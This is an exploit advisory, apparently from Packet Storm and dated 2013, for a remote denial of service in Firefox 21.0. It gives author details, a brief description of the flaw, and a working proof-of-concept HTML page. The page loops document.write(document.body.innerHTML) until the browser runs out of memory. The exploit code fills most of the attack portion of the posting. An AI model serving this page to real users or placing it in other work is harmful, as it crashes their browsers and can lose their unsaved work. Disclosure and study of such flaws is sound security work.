Mozilla Firefox browser version 21.0 suffers from a remote denial of service vulnerability when a loop is leveraged against document.write(document.body.innerHTML).
bc819cf7a43da917d125d0cfc0031789e76ca7137c00956f52a39dea1dcda135Title : Mozilla Firefox Browser 21.0 Remote Denial Of Service
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 22-06-2013
E-mail : jigsaw0658@gmail.com
Home : Morroco
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service ( all tabs are no longer accessible, your work might be lost)
Tested on : Mozilla Firefox 21.0 the latest release
OS : Tested on Windows 7/ Windows XP
Risk : Low[+] / Medium[-]
===========================================================================================
#Vulnerability:
This bug is a typical result of endless dialog loop.
The flaw exists when the attacker put document.write(document.body.innerHTML)
in multitudinous loop that make the browser Unable to handle this exception and fall in Out of Memory.
User interaction is required to exploit this vulnerability in that the target must visit a malicious web page.
============================================================================================
#Proof of Concept:
<html>
<body>
<script>
document.write("�����")
</script>
</body>
<script>
for (i=0;i<=99;i++)
{
document.write(document.body.innerHTML);
}
</script>
</html>
================================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed